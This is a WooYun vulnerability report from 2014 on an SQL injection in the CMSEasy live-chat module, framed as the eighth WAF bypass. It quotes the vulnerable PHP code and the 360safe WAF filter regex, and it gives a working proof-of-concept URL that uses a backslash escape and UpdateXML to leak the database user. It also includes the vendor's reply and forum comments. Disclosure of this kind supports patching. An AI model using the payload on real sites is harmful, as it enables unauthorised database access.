当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-080260

漏洞标题:cmseasy 最新版SQLl注入(第八次绕WAF)

相关厂商:cmseasy

漏洞作者: 路人甲

提交时间:2014-10-22 11:44

修复时间:2015-01-20 11:46

公开时间:2015-01-20 11:46

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-22: 细节已通知厂商并且等待厂商处理中
2014-10-24: 厂商已经确认,细节仅向厂商公开
2014-10-27: 细节向第三方安全合作伙伴开放
2014-12-18: 细节向核心白帽子及相关领域专家公开
2014-12-28: 细节向普通白帽子公开
2015-01-07: 细节向实习白帽子公开
2015-01-20: 细节向公众公开

简要描述:

继续绕啊绕啊

详细说明:

cmseasy 终于更新了 看了下对比文件,那修复~~~无法吐槽~~~~

function LiveMessage($a) {
    global $db;
    $sessionid = $_SESSION['sessionid'];
    $name = addslashes(htmlspecialchars($a['name']));
    $email = addslashes(htmlspecialchars($a['email']));
    $country = htmlspecialchars($a['country']);
    $phone = htmlspecialchars($a['phone']);
    $departmentid = htmlspecialchars($a['departmentid']);
    $message = htmlspecialchars($a['message']);
    $timestamp = time();
    $ip = $_SERVER['REMOTE_ADDR'];
    $sql = "INSERT INTO `chat` (`sessionid`,`name`,`email`,`phone`,`departmentid`,`message`,`timestamp`,`ip`,`status`) VALUES('" . $sessionid . "','" . $name . "','" . $email . "','" . $phone . "','" . $departmentid . "','" . $message . "','" . $timestamp . "','" . $ip . "','2')";
    $db->query($sql);
    $sql = "DELETE FROM `sessions` WHERE `id`='" . $sessionid . "'";
    $db->query($sql);
    $text = "<?php echo $lang[shout_success]?>\n";
    $objResponse = new xajaxResponse('utf-8');
    $objResponse->addAssign('content', 'innerHTML', $text);
    $objResponse->redirect('../', 5);
    return $objResponse;
}


$a是可以通过前端get或者post传入。
只修复了name和email,不修复下面几个变量 这是给我们留着漏洞挖么!!!!!!!
然后开始测试,擦 发现360safe被更新了,修复增加了检测单引号! 这不坑爹么,只要输入单引号全盘否定!

$getfilter = "\\<.+javascript:window\\[.{1}\\\\x|<.*=(&#\\d+?;?)+?>|<.*(data|src)=data:text\\/html.*>|\\b(alert\\(|confirm\\(|expression\\(|prompt\\(|benchmark\s*?\(.*\)|sleep\s*?\(.*\)|load_file\s*?\\()|<[a-z]+?\\b[^>]*?\\bon([a-z]{4,})\s*?=|^\\+\\/v(8|9)|\\b(and|or)\\b\\s*?([\\(\\)'\"\\d]+?=[\\(\\)'\"\\d]+?|[\\(\\)'\"a-zA-Z]+?=[\\(\\)'\"a-zA-Z]+?|>|<|\s+?[\\w]+?\\s+?\\bin\\b\\s*?\(|\\blike\\b\\s+?[\"'])|\\/\\*.*\\*\\/|<\\s*script\\b|\\bEXEC\\b|UNION.+?SELECT(\\(.+\\)|\\s+?.+?|`.*?`)|UPDATE(\\(.+\\)|\\s+?.+?|`.*?`.*?)SET|INSERT\\s+INTO.+?VALUES|(SELECT|DELETE)(\\(.+\\)|\\s+?.+?\\s+?|`.*?`.*?)FROM(\\(.+\\)|\\s+?.+?|`.*?`.*?)|(CREATE|ALTER|DROP|TRUNCATE)\\s+(TABLE|DATABASE)|\\/\\*.*?\\*\\/|'";


但是还可以用转义符,接下来就是开始绕啊绕啊:
POC:
http://192.168.152.160:8080/cmseasy/celive/live/header.php?xajax=LiveMessage&xajaxargs[0][phone]=\&xajaxargs[0][departmentid]=,(UpdateXML(1,CONCAT(0x5b,user(),0x5d),1)),6,7,8)%23
另外官网没测试成功,好像有安全狗

BaiduHi_2014-10-21_16-4-7.png


漏洞证明:

BaiduHi_2014-10-21_16-4-7.png

修复方案:

全盘否定单引号 这也太坑了!

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-10-24 11:03

厂商回复:

修正

最新状态:

2014-10-24:感谢提醒~~一时大意了~~

漏洞评价:

评论

  1. 2014-10-22 11:56 | 疯狗 认证白帽子 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)

    绕waf哪家强?

  2. 2014-10-22 11:57 | 狗狗侠 ( 普通白帽子 | Rank:497 漏洞数:55 | 我是狗狗侠)

    @疯狗 山东找蓝翔

  3. 2014-10-22 12:03 | menmen519 ( 普通白帽子 | Rank:762 漏洞数:146 | http://menmen519.blog.sohu.com/)

    我知道注入点 是哪里 你可真快啊 还是赞一个!!!!

  4. 2014-10-22 12:23 | 老笨蛋 ( 路人 | Rank:29 漏洞数:8 | 老笨蛋一个)

    楼主是新东方还是蓝翔毕业的啊。太淫荡了。

  5. 2014-10-22 13:16 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    绕过了八次,也是醉了。。

  6. 2014-10-22 13:17 | kenan@ ( 路人 | Rank:2 漏洞数:1 | php ,asp)

    绕过了8次?这

  7. 2014-10-22 13:17 | xfkxfk 认证白帽子 ( 核心白帽子 | Rank:2179 漏洞数:338 | 呵呵!)

    擦,我才饶了4次,你赢了

  8. 2014-10-22 13:49 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    我也醉了。。。@cmseasy 我帮你写补丁吧

  9. 2014-10-22 13:49 | char ( 路人 | Rank:13 漏洞数:3 | 中国平安,不只保险这么简单。)

    第八个工程师已被开除。

  10. 2014-10-22 14:32 | sco4x0 ( 实习白帽子 | Rank:31 漏洞数:13 | O_o)

    传说中的拔进拔出,哦不对,八进八出

  11. 2014-10-24 11:08 | phith0n 认证白帽子 ( 核心白帽子 | Rank:656 漏洞数:107 | 一个想当文人的黑客~)

    1,cmseasy真的生气了

  12. 2014-10-24 11:11 | pandas ( 普通白帽子 | Rank:585 漏洞数:58 | 国家一级保护动物)

    1是什么情况?

  13. 2014-10-24 17:38 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    @phith0n 程序员的自尊之类的东西吧,毕竟修8次都修不好暴露的不是编程功底或安全意识,而是智商。

  14. 2014-11-13 11:19 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    居然给低

  15. 2014-11-13 11:28 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    眼睁睁看着饶了八次 厂商也是醉了

  16. 2014-11-13 14:20 | luwikes ( 普通白帽子 | Rank:512 漏洞数:77 | 潜心学习~~~)

    不忍直视

  17. 2014-12-11 20:13 | 迦南 ( 路人 | Rank:14 漏洞数:11 | 我不是玩黑,我就是认真)

    @mramydnei 看透不说透。。。。

  18. 2014-12-11 20:50 | FenQing ( 路人 | Rank:8 漏洞数:3 | FenQing)

    楼主该不会还想来第八第九吧

  19. 2015-01-20 15:15 | 用来怀念 ( 路人 | Rank:0 漏洞数:1 | 不是什么人都一定要去拥有,有的东西最好用...)

    程序员绝壁已被开除!!!

  20. 2015-01-20 16:07 | BeenQuiver ( 普通白帽子 | Rank:101 漏洞数:26 | 专注而高效,坚持好的习惯千万不要放弃)

    @mramydnei 说这话就有点过了

  21. 2015-01-20 16:15 | mramydnei ( 普通白帽子 | Rank:348 漏洞数:80 )

    @BeenQuiver 嗯,可能有点伤人。但是我觉得会比较接近事实真相